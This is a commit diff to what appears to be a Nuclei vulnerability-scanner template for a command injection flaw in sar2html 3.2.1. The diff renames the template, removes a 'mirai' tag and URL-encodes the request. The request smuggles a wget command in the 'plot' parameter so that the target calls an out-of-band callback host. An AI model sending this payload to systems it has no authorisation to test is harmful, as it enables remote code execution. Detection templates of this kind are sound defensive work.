Update sar2html-rce.yaml
parent
0d2b53e71d
commit
cfc534af89
|
@ -1,26 +1,24 @@
|
||||||
id: sar2html-rce
|
id: sar2html-rce
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Sar2HTML - Remote Code Execution
|
name: sar2html 3.2.1 - 'plot' Remote Code Execution
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: critical
|
severity: critical
|
||||||
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
|
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
|
||||||
reference: |
|
reference: |
|
||||||
- https://www.exploit-db.com/exploits/49344
|
- https://www.exploit-db.com/exploits/49344
|
||||||
tags: sar2html,mirai,rce,oob
|
tags: sar2html,rce,oob
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
GET /index.php?plot=;wget http://{{interactsh-url}} HTTP/1.1
|
GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: python-requests/2.18.4
|
User-Agent: python-requests/2.18.4
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Connection: keep-alive
|
Connection: keep-alive
|
||||||
|
|
||||||
unsafe: true
|
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||||
|
|
Loading…
Reference in New Issue